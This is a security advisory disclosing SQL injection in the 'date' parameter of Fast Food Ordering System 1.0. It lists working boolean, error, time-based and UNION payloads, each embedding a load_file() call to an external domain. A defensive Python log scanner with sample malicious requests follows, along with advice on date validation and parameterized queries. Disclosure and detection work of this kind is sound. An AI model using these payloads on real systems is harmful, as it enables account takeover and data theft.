Fast Food Ordering System 1.0 SQL Injection
Fast Food Ordering System version 1.0 suffers from a remote SQL injection vulnerability.
## Title: Fast Food Ordering System 1.0 SQLi
## Author: nu11secur1ty
## Date: 05.30.2022
## Vendor: https://www.sourcecodester.com/users/tips23
## Software: https://www.sourcecodester.com/php/15366/fast-food-ordering-system-phpoop-free-source-code.html
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Fast-Food-Ordering

## Description:
The date parameter appears to be vulnerable to SQL injection attacks.
The payload '+(select load_file('\\\\j7r9s1wbepgqucip3y4eqrwzjqpkdb3zu2it5kt9.kakmoesitolkovatupiuporit.we\\wrk'))+' was submitted in the date parameter.
This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain.
The attacker can take control of administrator accounts and of all other accounts on this system, and the malicious user can also download all information about this system.

Status: CRITICAL

[+] Payloads:

```mysql
---
Parameter: date (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: page=reports&date=2022-05-30'+(select load_file('\\\\j7r9s1wbepgqucip3y4eqrwzjqpkdb3zu2it5kt9.kakmoesitolkovatupiuporit.we\\wrk'))+'' OR NOT 9209=9209 AND 'OBPK'='OBPK

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: page=reports&date=2022-05-30'+(select load_file('\\\\j7r9s1wbepgqucip3y4eqrwzjqpkdb3zu2it5kt9.kakmoesitolkovatupiuporit.we\\wrk'))+'' AND (SELECT 1113 FROM(SELECT COUNT(*),CONCAT(0x7178716271,(SELECT (ELT(1113=1113,1))),0x71706a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'BQRx'='BQRx

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=reports&date=2022-05-30'+(select load_file('\\\\j7r9s1wbepgqucip3y4eqrwzjqpkdb3zu2it5kt9.kakmoesitolkovatupiuporit.we\\wrk'))+'' AND (SELECT 2021 FROM (SELECT(SLEEP(5)))KAaB) AND 'ECXY'='ECXY

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: page=reports&date=2022-05-30'+(select load_file('\\\\j7r9s1wbepgqucip3y4eqrwzjqpkdb3zu2it5kt9.kakmoesitolkovatupiuporit.we\\wrk'))+'' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7178716271,0x785874484e685679414c78427953454c4b62524778654f596e645841574978764f414a7a6d616372,0x71706a7671),NULL,NULL,NULL,NULL,NULL#
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2022/Fast-Food-Ordering)

## Proof and Exploit:
[href](https://streamable.com/kkyrgk)
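For defenders: a legitimate `date` value on `page=reports` has the form YYYY-MM-DD, as in the payloads above, so every payload in this advisory fails a strict date check. The following is an added example, not code from the advisory or from the application. It applies that check to web access logs to flag requests for review. The log format, the `/admin/` path, the `page=home` request and the `example.invalid` host are assumptions, and the log lines are constructed.

```python
import re
from datetime import date
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines, not captured traffic. The /admin/ path and the
# *.example.invalid host are placeholders; lines 2 and 3 mirror payload shapes
# listed in this advisory.
SAMPLE_LOG = [
    '203.0.113.5 - - [30/May/2022:10:01:02 +0000] "GET /admin/?page=reports&date=2022-05-30 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [30/May/2022:10:02:10 +0000] "GET /admin/?page=reports&date=2022-05-30%27%2B(select%20load_file(%27%5C%5C%5C%5Cx.example.invalid%5C%5Cwrk%27))%2B%27 HTTP/1.1" 200 812',
    '198.51.100.9 - - [30/May/2022:10:02:15 +0000] "GET /admin/?page=reports&date=2022-05-30%27%20AND%20(SELECT%202021%20FROM%20(SELECT(SLEEP(5)))KAaB)%20AND%20%27ECXY%27%3D%27ECXY HTTP/1.1" 200 812',
    '203.0.113.5 - - [30/May/2022:10:03:00 +0000] "GET /admin/?page=home HTTP/1.1" 200 2048',
]

ISO_DATE = re.compile(r"[0-9]{4}-[0-9]{2}-[0-9]{2}")
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[0-9.]+"')


def parse_report_date(raw):
    """Return a datetime.date only if raw is exactly a real YYYY-MM-DD date."""
    if not ISO_DATE.fullmatch(raw):
        return None
    try:
        return date(int(raw[0:4]), int(raw[5:7]), int(raw[8:10]))
    except ValueError:  # well-formed but impossible, e.g. 2022-02-31
        return None


def suspicious_requests(lines):
    """Return (line_number, decoded_date) for page=reports hits with a bad date."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        params = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        if "reports" not in params.get("page", []):
            continue
        for value in params.get("date", []):
            if parse_report_date(value) is None:
                hits.append((number, value))
    return hits


if __name__ == "__main__":
    for number, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: rejected date value {value!r}")
```

The same allowlist check belongs in the application before the value reaches the database, together with a parameterized query, so that the `date` value is never concatenated into SQL.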